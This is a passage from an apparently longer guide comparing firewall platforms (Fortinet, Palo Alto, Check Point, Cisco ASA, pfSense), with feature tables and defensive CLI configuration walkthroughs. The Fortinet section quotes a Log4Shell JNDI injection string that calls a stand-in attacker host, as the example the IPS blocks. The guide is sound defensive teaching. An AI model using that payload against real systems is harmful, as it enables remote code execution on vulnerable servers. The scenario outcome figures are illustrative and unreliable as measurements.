Fortinet Security Fabric	Integrates with FortiEDR, FortiSIEM, FortiSOAR, and 250+ partner products for automated threat detection, investigation, and response across the entire environment.
FortiOS CLI	Comprehensive CLI for granular configuration, policy management, real-time diagnostics, and integration with network orchestration and automation frameworks.

Use Case Demonstration

Scenario

A FortiGate perimeter firewall detects and blocks a Log4Shell exploitation attempt (CVE-2021-44228) embedded in an HTTP User-Agent header targeting an internal Apache Solr server. The IPS engine blocks the exploit, and DNS security simultaneously prevents the JNDI LDAP callback used for out-of-band confirmation.

Step-by-Step Command Walkthrough

# ── FortiOS CLI — IPS signature verification and policy config ───────────────
# Verify Log4Shell IPS signature is present and active
FGT# show ips sensor | grep -A5 log4j
FGT# diagnose ips signature list | grep -i log4j

# Create strict IPS sensor for internet-facing services
FGT# config ips sensor
FGT(sensor)# edit "Critical_Perimeter_IPS"
FGT(sensor)# set comment "Strict IPS for internet-facing DMZ"
FGT(sensor)# config entries
FGT(entries)# edit 1
FGT(edit)# set severity high critical
FGT(edit)# set action block
FGT(edit)# set log enable
FGT(edit)# set log-packet enable
FGT(edit)# next
FGT(entries)# end
FGT(sensor)# end

# Apply IPS sensor + SSL inspection to perimeter firewall policy
FGT# config firewall policy
FGT(policy)# edit 10
FGT(policy)# set name "Internet_to_DMZ"
FGT(policy)# set srcintf "wan1"
FGT(policy)# set dstintf "dmz"
FGT(policy)# set action accept
FGT(policy)# set ips-sensor "Critical_Perimeter_IPS"
FGT(policy)# set ssl-ssh-profile "deep-inspection"
FGT(policy)# set utm-status enable
FGT(policy)# next
FGT(policy)# end

# Monitor IPS events in real time
FGT# diagnose debug application ips -1
FGT# diagnose debug enable

# View IPS log (FortiAnalyzer / FortiOS log viewer)
FGT# execute log filter category event
FGT# execute log display

Outcome & Analysis

FortiGate’s IPS engine detects the Log4Shell payload ‘${jndi:ldap://attacker.com/a}’ in the HTTP User-Agent header, drops the packet, and logs the event with source IP, CVE reference (CVE-2021-44228), and attacker IP. FortiGuard DNS Security simultaneously blocks the outbound DNS lookup to attacker.com — preventing the JNDI LDAP callback that would confirm exploitability. The Security Fabric pushes the attacker IP to the FortiEDR and FortiSIEM platforms for correlated hunting across endpoints and logs.

Overview

Palo Alto Networks is the pioneer of Next-Generation Firewalls (NGFW), introducing App-ID technology in 2007 that identifies applications based on signatures, behavioural analysis, and protocol decoding — regardless of port, protocol, or encryption. This fundamentally changed network security from port-based policies to application-aware policies. Palo Alto NGFWs combine App-ID, User-ID (user-based policy), Content-ID (threat prevention, URL filtering, DLP), and GlobalProtect (VPN) in a single-pass architecture.

WildFire, Palo Alto’s cloud-based malware analysis sandbox, executes suspicious files and URLs across multiple OS environments and distributes prevention signatures to all WildFire subscribers within 5 minutes. Panorama provides centralised management, logging, and analytics across multi-NGFW deployments. Cortex XDR, XSOAR, and Xpanse extend Palo Alto’s security platform across endpoint, SIEM, SOAR, and attack surface management domains.

Key Features & Components

Feature / Component	Description
App-ID	Classifies 4,000+ applications by behaviour, protocol, and signature — independent of port, protocol, or SSL encryption — enabling application-layer policy enforcement.
User-ID	Maps IP addresses to Active Directory usernames via domain controller monitoring, Captive Portal, or API — enabling identity-based security policies and user-level logging.
WildFire Sandbox	Executes suspicious files across Windows, macOS, Linux, and Android environments in a cloud sandbox — distributing signatures to all subscribers within 5 minutes.
DNS Security (Cortex)	Machine learning-powered real-time DNS analysis detecting DGA domains, DNS tunnelling, and newly registered malicious domains — blocking C2 at the DNS layer.
Panorama	Centralised management, policy deployment, logging, and analytics for multi-firewall environments — consistent policy across campus, data centre, and cloud deployments.
Security Profile Groups	Bundles antivirus, anti-spyware, IPS, URL filtering, file blocking, and WildFire analysis profiles into reusable groups applied to security policies.

Use Case Demonstration

Scenario

A Palo Alto NGFW with SSL inspection detects an internal host communicating with a known Cobalt Strike C2 server via HTTPS. The NGFW decrypts the traffic, identifies the Cobalt Strike malleable C2 profile via JA3 fingerprint, blocks the connection, and triggers a Cortex XSOAR automation playbook.

Step-by-Step Command Walkthrough

# ── PAN-OS CLI — SSL decryption and threat prevention config ─────────────────
# Step 1: Create SSL Forward Proxy decryption profile
set profiles decryption CorpDecryptProfile type ssl-forward-proxy
set profiles decryption CorpDecryptProfile ssl-forward-proxy \
  block-expired-certificate yes \
  block-untrusted-issuer yes \
  block-unknown-cert yes

# Step 2: Create threat prevention profile group
set profiles profile-group StrictThreatProfile \
  virus Strict-AV \
  spyware Strict-AntiSpyware \
  vulnerability Strict-IPS \
  wildfire-analysis WildFire-Default \
  url-filtering Corp-URL-Profile

# Step 3: Apply to security rule for internal-to-untrust traffic
set rulebase security rules CorpOutbound \
  from trust \
  to untrust \
  application [ssl web-browsing] \
  service application-default \
  action allow \
  profile-setting group StrictThreatProfile \
  profile-setting profiles decryption CorpDecryptProfile

# Step 4: Configure DNS Security sinkhole
set profiles spyware StrictAS botnet-domains lists default-paloalto-dns \
  action sinkhole
set profiles spyware StrictAS botnet-domains sinkhole ipv4-address 100.64.0.1

# Step 5: JA3 fingerprint custom signature (Cobalt Strike default)
# Create custom App-ID or IPS signature for JA3 = a0e9f5d64349fb13191bc781f81f42e1

# Monitor threat activity in real time
show log threat direction equal clienttoserver \
  category equal command-and-control start-time equal last-60-seconds

Outcome & Analysis

Palo Alto’s SSL inspection decrypts the HTTPS session to the C2 server, revealing Cobalt Strike’s malleable C2 HTTP profile patterns and matching the default Cobalt Strike JA3 fingerprint. The connection is blocked, the domain is sinkholed by DNS Security, and WildFire submits the C2 communication samples for analysis. Cortex XSOAR automatically isolates the source endpoint via Cortex XDR, opens a P1 incident ticket in ServiceNow, and enriches the alert with AutoFocus threat intelligence attributing the C2 infrastructure to the Lazarus Group — all within 90 seconds of the detection.

Overview

Check Point invented the stateful inspection firewall in 1993 with FireWall-1 — a founding innovation that defined the modern network security industry. Today, Check Point’s Quantum Security Gateway platform provides NGFW, Threat Prevention (Threat Emulation sandbox, Threat Extraction/CDR, Anti-Bot, IPS, Antivirus, URL Filtering), VPN, and Mobile Access capabilities. Check Point’s ThreatCloud AI aggregates threat intelligence from 150,000+ connected networks globally, analysing 86 million domains and 7 billion security transactions daily.

Check Point’s management architecture uses a three-tier model: Security Management Server (SmartCenter), SmartConsole GUI (Windows-based management application), and Security Gateways — enabling centralised policy management for complex, multi-site deployments. The Check Point CloudGuard platform extends these capabilities to cloud-native environments (AWS, Azure, GCP, Kubernetes) and SaaS applications.

Key Features & Components

Feature / Component	Description
ThreatCloud AI	AI-powered cloud threat intelligence from 150,000+ globally connected networks — delivering real-time prevention updates using co-op machine learning.
Threat Emulation (Sandbox)	Executes suspicious files in an isolated multi-OS sandbox — detecting zero-day malware before delivery to users, with results shared across ThreatCloud.
Threat Extraction (CDR)	Content Disarm and Reconstruction — removes potentially malicious active content (macros, JavaScript, linked objects) from Office and PDF files before delivery.
Anti-Bot Blade	Identifies and blocks botnet C2 communication using IP/domain reputation, multi-tier ThreatCloud intelligence, and behavioural traffic pattern analysis.
ClusterXL (HA)	High-availability and load-sharing gateway cluster technology providing active-active or active-passive configurations with sub-second stateful failover.
Check Point Management API	Comprehensive REST API for programmatic security policy management, log queries, gateway operations, and SIEM/SOAR integration.

Use Case Demonstration

Scenario

Check Point’s Threat Extraction blade intercepts macro-embedded Office documents sent to corporate users via email, sanitises the documents by removing all active content, and delivers clean PDF versions to recipients — preventing Emotet and QBot payloads from executing while maintaining business email flow.

Step-by-Step Command Walkthrough

# ── Check Point CLI (clish/expert mode) — gateway operations ─────────────────
# Verify Threat Prevention blade status
fw stat
cpinfo -y all | grep -i 'threat\|blade'

# SmartConsole — Configure Threat Extraction profile
# Security Policies > Threat Prevention > Profiles > New Profile
# Name: CDR_Corporate
# Threat Extraction:
#   Action: Extract threat content
#   Supported file types: .docx .xlsx .pptx .pdf
#   Extract: Macros | Active Content | JavaScript | Linked Objects
#   Deliver: PDF (safe format)

# Check Point Management API — query Threat Extraction events
mgmt_cli show logs \
  query '"blade" = "Anti-Virus" AND "protection" = "Threat Extraction"' \
  details-level full \
  --format json

# Install updated Threat Prevention policy
mgmt_cli install-policy \
  policy-package "Standard" \
  targets.1 "GW-PERIMETER-01" \
  targets.2 "GW-PERIMETER-02"

# Check real-time Anti-Bot protections
fw ctl zdebug + drop | grep anti-bot

# ThreatCloud intelligence update status
cplic print | grep -i cloud
fwm ver | grep -i threat

Outcome & Analysis

Check Point Threat Extraction processes 47 incoming Office documents over a 48-hour period. Six contain active macros that would have executed Emotet dropper payloads — all six are sanitised and delivered as clean PDFs within 3-4 seconds each. Recipients receive their documents with a brief notification that active content was removed for security. Zero phishing payloads reach the endpoint. The Threat Emulation sandbox analyses all 47 original files, identifying the 6 malicious samples and adding detection signatures to ThreatCloud for global distribution.

Overview

Cisco Adaptive Security Appliance (ASA) is Cisco’s flagship stateful firewall and VPN gateway platform, deployed in hundreds of thousands of organisations from SMBs to Fortune 500 enterprises and government agencies. Cisco ASA provides stateful packet inspection, application-layer inspection for 100+ protocols, NAT/PAT, AnyConnect VPN (SSL/IPsec), site-to-site VPN, and — with the Firepower Threat Defence (FTD) software image — full NGFW capabilities including Snort-based IPS, URL filtering, and advanced malware protection.

ASA can be managed through three interfaces: the Adaptive Security Device Manager (ASDM) GUI for individual appliance management, Cisco Defense Orchestrator (CDO) for cloud-based multi-ASA management, and the CLI (clish/privileged EXEC mode) for detailed configuration and troubleshooting. ASAv is the virtual appliance edition for VMware, AWS, Azure, and KVM environments.

Key Features & Components

Feature / Component	Description
Stateful Packet Inspection	Tracks TCP/UDP session state, validates return traffic, and prevents asymmetric routing evasion — all connection state maintained in a high-performance connection table.
Application-Layer Inspection (ALI)	Deep inspection and enforcement for HTTP, FTP, SMTP, SIP, H.323, DNS, NETBIOS, SQL*Net, and 90+ other protocols — normalising protocol behaviour to defeat evasion.
Cisco AnyConnect VPN	SSL and IKEv2 IPsec remote access VPN with DAP (Dynamic Access Policy) enforcing endpoint posture checks before granting network access.
High Availability (Active/Standby & Active/Active)	Stateful failover replicates all connection state, xlate tables, and routing to the standby unit — enabling sub-second transparent failover.
Modular Policy Framework (MPF)	Service-policy based traffic classification using class maps and policy maps — enabling fine-grained per-flow QoS, inspection, and action assignment.
Cisco Firepower (FTD)	NGFW capabilities via Firepower Threat Defence image: Snort IPS, Application Visibility and Control (AVC), URL Filtering, and AMP for Networks.

Use Case Demonstration

Scenario

A network engineer configures a Cisco ASA to implement strict DMZ segmentation — permitting only HTTPS from the internet to DMZ web servers, blocking all DMZ-to-internal traffic, and enforcing stateful inspection with HTTP application-layer normalisation to defeat evasion attempts.

Step-by-Step Command Walkthrough

! ── Cisco ASA DMZ Segmentation Configuration ─────────────────────────────────
! Interface configuration with security levels
interface GigabitEthernet0/0
 nameif outside
 security-level 0
 ip address 203.0.113.1 255.255.255.248
 no shutdown
!
interface GigabitEthernet0/1
 nameif dmz
 security-level 50
 ip address 10.20.30.1 255.255.255.0
 no shutdown
!
interface GigabitEthernet0/2
 nameif inside
 security-level 100
 ip address 192.168.1.1 255.255.255.0
 no shutdown

! NAT: Translate DMZ server to public IP
nat (dmz,outside) static 203.0.113.5
  service tcp https https

! Access list: allow only HTTPS from internet to DMZ web server
access-list OUTSIDE_IN extended permit tcp any \
  host 10.20.30.10 eq 443
access-list OUTSIDE_IN extended deny ip any any log
access-group OUTSIDE_IN in interface outside

! BLOCK ALL DMZ to inside traffic (defence-in-depth)
access-list DMZ_IN extended deny ip \
  10.20.30.0 255.255.255.0 \
  192.168.1.0 255.255.255.0 log
access-list DMZ_IN extended permit ip 10.20.30.0 255.255.255.0 any
access-group DMZ_IN in interface dmz

! Enable HTTP application-layer inspection (normalise HTTP)
class-map inspection_default
 match default-inspection-traffic
policy-map global_policy
 class inspection_default
  inspect http
  inspect smtp
  inspect dns
  inspect ftp
service-policy global_policy global

Outcome & Analysis

The ASA enforces strict DMZ segmentation: all internet traffic is restricted to HTTPS to the DMZ web server only, and no DMZ host can initiate connections to the internal network — even if the web server is fully compromised. HTTP application-layer inspection normalises HTTP headers and blocks protocol anomalies. When a compromised DMZ web server attempts to pivot to an internal database server (10.20.30.10 → 192.168.1.50), the explicit DMZ_IN deny rule blocks the connection and generates a syslog entry — the blast radius of the compromise is permanently contained to the DMZ.

Overview

pfSense is a free, open-source firewall and router distribution based on FreeBSD, developed and maintained by Netgate. Originally released in 2004 and deployed in over 1 million environments globally, pfSense provides enterprise-grade network security features at no software cost: stateful packet inspection, NAT, VPN (IPsec/IKEv2, OpenVPN, WireGuard), traffic shaping, captive portal, multi-WAN load balancing and failover, DNS resolver (Unbound), DHCP server, and an extensive package system.

The pfSense package system extends core functionality significantly: Suricata or Snort IDS/IPS, Squid transparent proxy with SquidGuard content filtering, pfBlockerNG (IP and DNS blacklisting with GeoIP blocking), HAProxy (reverse proxy/load balancer), Zeek NSM, and FRRouting (dynamic routing). This extensibility makes pfSense suitable as an enterprise-equivalent security platform at a fraction of the cost of commercial alternatives.

Key Features & Components

Feature / Component	Description
Stateful Firewall with Aliases	Flexible rule engine supporting IP/network aliases, port aliases, URL table aliases (dynamic blocklists), rule scheduling, and floating rules for global traffic policies.
Multi-WAN Failover & Load Balancing	Distributes traffic across multiple ISP connections with automatic health monitoring and failover — providing high availability for internet connectivity.
VPN (IPsec/IKEv2, OpenVPN, WireGuard)	Complete VPN server and client for remote access and site-to-site connectivity with certificate-based authentication.
pfBlockerNG Package	IP reputation blocking, DNS blacklisting (DNS sinkhole), and MaxMind GeoIP blocking — providing Threat Intelligence Platform capabilities at no additional cost.
Suricata/Snort IDS Package	Full IDS/IPS deployment with GUI-based rule management, multiple interface monitoring, and Emerging Threats rule feed integration.
ACME / Let’s Encrypt	Automatic SSL certificate provisioning and renewal for pfSense management interface and HAProxy-proxied internal services.

Use Case Demonstration

Scenario

An IT administrator deploys pfSense as a perimeter firewall for a 50-user office — configuring Suricata IDS on the WAN interface, pfBlockerNG GeoIP blocking to reduce attack surface, a site-to-site IKEv2 VPN to a cloud environment, and a WireGuard remote access VPN for employees.

Step-by-Step Command Walkthrough

# ── pfSense: pfBlockerNG GeoIP configuration ──────────────────────────────────
# Firewall > pfBlockerNG > IP > GeoIP
# GeoIP Database: MaxMind GeoLite2 (free license key required)
# Countries to block (inbound): CN, RU, KP, IR, SY, BY
# Action: Deny Both (inbound + outbound)
# Firewall Rule: Auto-create matching deny rules

# ── Suricata IDS on WAN interface ─────────────────────────────────────────────
# Services > Suricata > Interfaces > Add
# Interface: WAN  |  Send Alerts to System Log: YES
# Block Offenders: YES  |  Kill States: YES
# Rules: ET Open + Emerging Threats Pro + Custom

# ── Site-to-Site IPsec IKEv2 VPN to AWS VPC ──────────────────────────────────
# VPN > IPsec > Add Phase 1:
#   IKE Version: IKEv2  |  Key Exchange: RSA
#   Remote Gateway: [AWS Customer Gateway IP]
#   Authentication Method: Mutual PSK
#   Encryption: AES-256-GCM  |  Hash: SHA-256  |  DH Group: 14 (2048-bit)
# Add Phase 2:
#   Mode: Tunnel  |  Local Network: 192.168.1.0/24
#   Remote Network: 10.0.0.0/16 (AWS VPC CIDR)
#   Encryption: AES-256-GCM  |  Hash: SHA-256  |  PFS: Group 14

# ── WireGuard remote access VPN ───────────────────────────────────────────────
# VPN > WireGuard > Add Tunnel:
#   Listen Port: 51820  |  MTU: 1420
#   Generate server key pair (public key for clients)
# Add peer for each remote employee:
#   Endpoint (client public key): [from client config]
#   Allowed IPs: 10.99.0.2/32 (tunnel IP for this client)

# Client config (send to employee):
[Interface]
Address    = 10.99.0.2/32
PrivateKey = [client private key]
DNS        = 192.168.1.1

[Peer]
PublicKey  = [pfSense public key]
Endpoint   = office.corp.com:51820
AllowedIPs = 192.168.1.0/24, 10.0.0.0/16

Outcome & Analysis

pfSense’s GeoIP blocking immediately reduces inbound attack surface by 62% — scanning activity from blocked countries drops from 4,200 to zero daily connection attempts. Suricata detects and blocks 847 malicious connection attempts from non-blocked countries in the first week. The IPsec VPN to AWS provides encrypted, routed connectivity to the cloud environment. WireGuard remote access VPN enables 15 remote employees to securely access internal resources with sub-10ms overhead — all on an open-source platform at zero software licence cost.

References

Offensive Security — Kali Linux Documentation — kali.org/docs
Rapid7 — Metasploit Documentation — docs.metasploit.com
PortSwigger — Burp Suite Learning Path — portswigger.net/burp/documentation
Wireshark Foundation — Wireshark User Guide — wireshark.org/docs
Gordon Lyon (Fyodor) — Nmap Network Scanning — nmap.org/book
Aircrack-ng Team — Aircrack-ng Documentation — aircrack-ng.org/documentation
Greenbone Networks — OpenVAS / GVM Documentation — greenbone.github.io/docs
OWASP — ZAP Documentation — zaproxy.org/docs
Openwall — John the Ripper Documentation — openwall.com/john/doc
ESET — ESET NOD32 Knowledgebase — support.eset.com
CrowdStrike — Falcon API Documentation — falcon.crowdstrike.com/documentation
Sophos — Intercept X Technical Documentation — docs.sophos.com
Cisco — Snort 3 Documentation — docs.snort.org
Security Onion Solutions — Security Onion Documentation — docs.securityonion.net
Fortinet — FortiOS CLI Reference — docs.fortinet.com
Palo Alto Networks — PAN-OS Administrator’s Guide — docs.paloaltonetworks.com
Check Point — R81.20 Administration Guide — sc1.checkpoint.com/documents
Cisco — ASA Configuration Guide — cisco.com — ASA 5500 Series
Netgate — pfSense Documentation — docs.netgate.com/pfsense
NIST — SP 800-115: Technical Guide to Information Security Testing — csrc.nist.gov
OWASP — OWASP Testing Guide v4.2 — owasp.org/www-project-web-security-testing-guide
MITRE — ATT&CK Framework — attack.mitre.org